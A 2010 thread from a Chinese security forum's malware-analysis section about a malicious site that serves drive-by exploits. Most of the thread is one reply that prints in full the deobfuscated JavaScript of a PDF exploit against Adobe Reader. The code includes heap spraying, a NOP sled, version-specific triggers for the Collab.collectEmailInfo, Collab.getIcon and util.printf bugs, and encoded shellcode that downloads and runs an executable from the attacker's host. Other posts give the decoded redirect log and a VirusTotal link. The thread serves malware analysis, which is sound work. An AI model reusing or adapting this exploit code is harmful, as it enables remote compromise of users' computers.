收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 网络安全(毒网分析) http://supermen.web44.net/index.php
返回列表 发新帖
查看: 1792|回复: 2
收起左侧

[其它] http://supermen.web44.net/index.php

[复制链接]
是昔流芳
发表于 2010-4-4 06:41:50 | 显示全部楼层 |阅读模式
关于:hxxp://supermen.web44.net/index.php解密的日志(全体输出 -  2):

Level  0>http://supermen.web44.net/index.php
Level  1>http://supermen.web44.net//getexe.php?spl=mdac  ●

analyzed by 是昔流芳
回复

举报

辰——
发表于 2010-4-4 08:02:08 | 显示全部楼层

  2. var G2OswV27mbR6m8ol = new Array();
  3. var baoHe3ZqsoIA7VyI;
  4. function INAStBZfn1lZ9ZLG(gAXoC8f6wyG3TEKz, eUSVg3AU3v5BVPRf){while (gAXoC8f6wyG3TEKz.length * 2 < eUSVg3AU3v5BVPRf){gAXoC8f6wyG3TEKz += gAXoC8f6wyG3TEKz;}gAXoC8f6wyG3TEKz = gAXoC8f6wyG3TEKz.substring(0, eUSVg3AU3v5BVPRf / 2);
  5.   return gAXoC8f6wyG3TEKz;}
  6. function h2KsYZtcuv3CfvLN(jIGnrAQl6SxlNJ02){
  7. var Fz9x0YjF1h2N1APh = unescape("%u9090%u9090");
  8. var MMmC4za6Rz2TWDxN = jIGnrAQl6SxlNJ02 - 0x700000;
  9. var FvEkvpqNorqK6oiK = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u7075%u7265%u656D%u2E6E%u6577%u3462%u2E34%u656E%u2F74%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u0066");
  10. while (Fz9x0YjF1h2N1APh.length<slackspace) Fz9x0YjF1h2N1APh+=Fz9x0YjF1h2N1APh;
  11. FvEkvpqNorqK6oiK = jIGnrAQl6SxlNJ02.substring(0, jIGnrAQl6SxlNJ02);}
  12. function vzUm8As4996bNPbz(n5Va7g60c0L8Zmn0){
  13.   var vIvsSowbx2DKRpKM = 0x0c0c0c0c;var Sqx2W3B9BWFkI4t5 = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u7075%u7265%u656D%u2E6E%u6577%u3462%u2E34%u656E%u2F74%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u0066");if (n5Va7g60c0L8Zmn0 == 1){vIvsSowbx2DKRpKM = 0x30303030;Sqx2W3B9BWFkI4t5 = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u7075%u7265%u656D%u2E6E%u6577%u3462%u2E34%u656E%u2F74%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u0066");}
  14.   else if (n5Va7g60c0L8Zmn0 == 2){Sqx2W3B9BWFkI4t5 = unescape("%uA164%u0018%u0000%u408B%u8B30%u5440%u408B%u8B04%u0440%u408B%u0D04%u0020%u0020%u7C3D%u7700%u7400%uC301%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A4E%uE2D1%uE22B%uEC8B%u45C7%u6E10%u652E%uC778%u1445%u01FF%u0000%u45C7%u0000%u0000%uEB00%u5A4F%u8352%u56EA%u5589%u5618%u8B57%u3C73%u748B%u7833%uF303%u8B56%u2076%uF303%uC933%u5049%uAD41%uFF33%u0F36%u14BE%u3803%u74F2%uC108%u0DCF%uFA03%uEB40%u58EF%uF83B%uE575%u8B5E%u2446%uC303%u8B66%u480C%u568B%u031C%u8BD3%u8A04%uC303%u5E5F%uC350%u7D8D%u571C%uB852%uCA33%u5B8A%uA2E8%uFFFF%u32FF%u8BC0%uF2F7%u4FAE%u458B%uAB10%u9866%uAB66%uC033%u61B8%u0064%u5000%u5468%u7268%u3565%u1C24%u7469%u5450%uB853%uFCAA%u7C0D%u55FF%u8318%u0CC4%uB050%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u1855%uC483%u930C%u3350%u50C0%u5650%u558B%u0318%u1455%u5052%u36B8%u2F1A%uFF70%u1855%u835B%u007D%u0F01%u9E85%u0000%u6A00%u6800%u0080%u0000%u036A%u006A%u036A%u0068%u0000%u56C0%uA5B8%u0017%uFF7C%u1855%u4589%u6A04%u6804%u1000%u0000%u0068%u0800%u6A00%uB800%uCA54%u91AF%u55FF%u8918%u0C45%u6A50%u8D00%u084D%u6851%u0000%u0008%uFF50%u0475%u16B8%uFA65%uFF10%u1855%u8B5F%u8317%u04C7%u4D8B%u8308%u04E9%uA7E8%u0000%u6A00%u6A00%u6A00%uFF00%u0475%uACB8%uDA08%uFF76%u1855%u006A%u4D8D%u5108%u75FF%uFF08%u0C75%u0483%u0424%u75FF%uB804%u791F%uE80A%u55FF%uFF18%u0475%uFBB8%uFD97%uFF0F%u1855%u45C7%u0200%u0000%u5700%uB856%uFE98%u0E8A%u55FF%uEB18%u182A%uF92A%uD2B7%uB377%u4501%u928A%uADB7%u5D50%u67E4%uE6F5%u1AC7%uABBF%u101E%u7642%uA1A2%u6354%u7B09%uB089%u97F4%u734E%u3F93%u83F1%u007D%u7402%uC760%u0045%u0001%u0000%u45C7%u7910%u652E%uC778%u1445%u0172%u0000%u7D8B%u0318%u147D%u26B9%u0000%u8B00%uFC57%u05E8%u0000%uE900%uFE7C%uFFFF%uC033%u078A%uC8D2%uC132%uD0F6%uC532%uC232%uC632%uC0D2%uC102%uC502%uC202%uC602%uC8D2%uC12A%uC52A%uD0F6%uC22A%uC62A%uC0D2%uC2D3%uCA0F%u0788%u4947%uCE75%uC3C3%u7468%u7074%u2F3A%u732F%u7075%u7265%u656D%u2E6E%u6577%u3462%u2E34%u656E%u2F74%u672F%u7465%u7865%u2E65%u6870%u3F70%u7073%u3D6C%u6470%u0066");}
  15.   var FpxodtQavdvNTGjN = 0x400000;var TgOcjZlu72eO5YTQ = Sqx2W3B9BWFkI4t5.length * 2;var eUSVg3AU3v5BVPRf = FpxodtQavdvNTGjN - (TgOcjZlu72eO5YTQ + 0x38);var gAXoC8f6wyG3TEKz = unescape("%u9090%u9090");gAXoC8f6wyG3TEKz = INAStBZfn1lZ9ZLG(gAXoC8f6wyG3TEKz, eUSVg3AU3v5BVPRf);var BQE2JfcEJYbmoL0v = (vIvsSowbx2DKRpKM - 0x400000) / FpxodtQavdvNTGjN;for (var bYYl9JfEKKdPt7pG = 0; bYYl9JfEKKdPt7pG < BQE2JfcEJYbmoL0v; bYYl9JfEKKdPt7pG ++ ){G2OswV27mbR6m8ol[bYYl9JfEKKdPt7pG] = gAXoC8f6wyG3TEKz + Sqx2W3B9BWFkI4t5;}}
  16. function c5Iqju63ThpH3zD5(){
  17.   var mmpg6VuQqYpjef1B = 0;var yI2TD7WgnMyqLBvs = app.viewerVersion.toString();app.clearTimeOut(baoHe3ZqsoIA7VyI);
  18.   if (yI2TD7WgnMyqLBvs < 7.1){
  19.     vzUm8As4996bNPbz(0);
  20.     var GkY4GTU72Kpgzprj = unescape("%u0c0c%u0c0c");while (GkY4GTU72Kpgzprj.length < 44952)GkY4GTU72Kpgzprj += GkY4GTU72Kpgzprj;this .collabStore = Collab.collectEmailInfo({subj : "", msg : GkY4GTU72Kpgzprj});}
  21. if (yI2TD7WgnMyqLBvs >= 9){
  22.     try {if (app.doc.Collab.getIcon){vzUm8As4996bNPbz(2);var RtDL1k2o7zeRAZK9 = unescape("%09");
  23. while (RtDL1k2o7zeRAZK9.length < 0x4000)RtDL1k2o7zeRAZK9 += RtDL1k2o7zeRAZK9;RtDL1k2o7zeRAZK9 = "N." + RtDL1k2o7zeRAZK9;app.doc.Collab.getIcon(RtDL1k2o7zeRAZK9);mmpg6VuQqYpjef1B = 1;}else {mmpg6VuQqYpjef1B = 1;}}catch (e){mmpg6VuQqYpjef1B = 1;}if (mmpg6VuQqYpjef1B == 1){if ((yI2TD7WgnMyqLBvs >= 7.1&& yI2TD7WgnMyqLBvs < 9)){vzUm8As4996bNPbz(1);var stCaNghP1W6zMxjT = "12999999999999999999";for (YxorhqfnpKF1uZ9F = 0; YxorhqfnpKF1uZ9F < 276; YxorhqfnpKF1uZ9F ++ ){stCaNghP1W6zMxjT += "8";}util.printf("%45000f", stCaNghP1W6zMxjT);}}}}
  24. app.kKqp1XF24K2PIkt0 = c5Iqju63ThpH3zD5;baoHe3ZqsoIA7VyI = app.setTimeOut("app.kKqp1XF24K2PIkt0()", 10);
复制代码
hxxp://supermen.web44.net//getexe.php?spl=pdf

评分

参与人数 1经验 +1 收起 理由
是昔流芳 + 1 加分鼓励

查看全部评分

回复

举报

angir
发表于 2010-4-4 10:34:32 | 显示全部楼层
本帖最后由 angir 于 2010-4-4 10:35 编辑

http://www.virustotal.com/analis ... 55819245-1270348303

瑞星强大的miss

RS20100404102756625739
回复

举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-1-19 02:36 , Processed in 0.139043 second(s), 17 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表